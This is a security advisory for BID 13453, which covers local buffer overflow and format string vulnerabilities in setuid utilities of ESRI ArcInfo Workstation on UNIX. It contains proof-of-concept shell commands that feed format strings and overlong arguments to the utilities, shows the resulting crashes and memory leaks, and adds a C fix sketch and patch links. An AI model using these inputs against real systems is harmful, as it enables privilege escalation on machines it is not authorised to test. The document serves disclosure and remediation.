ESRI ArcInfo Workstation Multiple Local Buffer Overflow And Format String Vulnerabilities
BID:13453
Info
| Bugtraq ID: | 13453 |
| Class: | Unknown |
| CVE: | CVE-2005-1393, CVE-2005-1394 |
| Remote: | No |
| Local: | Yes |
| Published: | Apr 30 2005 12:00AM |
| Updated: | Jul 12 2009 02:06PM |
| Credit: | Discovery is credited to Kevin Finisterre. |
| Vulnerable: | ESRI ArcInfo Workstation on UNIX 9.0, ESRI ArcInfo Workstation on UNIX 8.3 |
| Not Vulnerable: | |
Discussion
ESRI ArcInfo Workstation is prone to multiple local buffer overflow and format string vulnerabilities. These vulnerabilities exist in various setuid/setgid utilities installed by ArcInfo Workstation.
The vulnerabilities may be exploited to execute arbitrary code with elevated privileges.
It is believed that the vulnerabilities affect all ArcInfo Workstation installations on UNIX platforms.
Exploit / POC
The following proof-of-concept examples were provided:
-bash-2.05b$ export ARCHOME=AAAABBBB%x.%x.%x.%x
-bash-2.05b$ ./wservice
Can not find or access AAAABBBB7ffffc00.2a078.9e39c.241 - wservice not run!
-bash-2.05b# export ARCHOME=%x.%x.%x.%x
-bash-2.05b# ./lockmgr
Can not find or access 7ffffc00.2a15c.9e39c.36 - lockmgr not run!
-bash-2.05b# ./asmaster `perl -e 'print "A" x 2285'` b
FATAL ERROR
Segment Violation
-bash-2.05b# ./asuser `perl -e 'print "A" x 694'` a a a
FATAL ERROR
Segment Violation
-bash-2.05b# ./asutility DBDEF REMOVE `perl -e 'print "A" x 701'`
FATAL ERROR
Segment Violation
-bash-2.05b# ./asutility RMDB `perl -e 'print "A" x 1865'`
FATAL ERROR
Segment Violation
-bash-2.05b# ./asutility CHECKDBIDS AVAILABLE `perl -e 'print "A" x 804'`
FATAL ERROR
Segment Violation
-bash-2.05b# ../bin/se `perl -e 'print "A" x 1278'`
FATAL ERROR
Segment Violation
-bash-2.05b# ./asrecovery `perl -e 'print "A" x 1987'` a a a
FATAL ERROR
Segment Violation
Exploit code was also released for the 'wservice' format string vulnerability.
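The output above shows both bug classes: `%x` in ARCHOME being expanded inside the error message, and long arguments overrunning fixed buffers. The following C sketch is an added example, not ESRI's code or part of the original advisory. It shows the unsafe pattern in a comment and a hardened way to build the same message; the function name `build_not_found_msg` and the `MSG_MAX` limit are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical limit for this example; not a value from ArcInfo. */
#define MSG_MAX 256

/*
 * Unsafe pattern (the bug class, not ESRI's source):
 *     sprintf(msg, "Can not find or access %s - %s not run!", path, prog);
 *     printf(msg);     // a %x inside path is now parsed as a conversion
 * sprintf() also overruns msg when path is longer than the buffer.
 */

/*
 * Hardened form: the untrusted value is only ever a %s argument and the
 * write is bounded. Returns 0 on success, -1 on NULL input or when the
 * message would not fit (out is left empty, never partially written).
 */
int build_not_found_msg(char *out, size_t outsz,
                        const char *path, const char *prog)
{
    int n;

    if (out == NULL || outsz == 0)
        return -1;
    out[0] = '\0';
    if (path == NULL || prog == NULL)
        return -1;

    n = snprintf(out, outsz, "Can not find or access %s - %s not run!",
                 path, prog);
    if (n < 0 || (size_t)n >= outsz) {   /* error or truncated */
        out[0] = '\0';
        return -1;
    }
    return 0;
}

int main(void)
{
    char msg[MSG_MAX];
    /* Constructed input, same shape as the ARCHOME value on the page. */
    const char *archome = "AAAABBBB%x.%x.%x.%x";

    if (build_not_found_msg(msg, sizeof msg, archome, "wservice") == 0)
        fputs(msg, stderr);              /* fputs does no format parsing */
    fputc('\n', stderr);
    return 0;
}
```

With this form the `%x` sequences are printed literally, and an over-long value is rejected instead of being copied.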
Solution / Fix
Solution:
The vendor has released patches for ArcInfo Workstation 9.0 on UNIX. Please see the "ArcInfo Workstation 9.0 Security Patch on UNIX" advisory for further details.
ESRI has released a patch for ArcInfo Workstation 8.3 on UNIX.
ESRI ArcInfo Workstation on UNIX 8.3
- ESRI ArcInfo Workstation 8.3 Security Patch on UNIX
  http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.viewPatch&PID=14&MetaID=1020
References
References:
- ArcInfo Workstation 9.0 Security Patch on UNIX (ESRI)
- ArcInfo Workstation Homepage (ESRI)
- DMA[2005-0425a] - 'ESRI ArcGIS 9.x multiple local vulnerabilities' (Kevin Finisterre)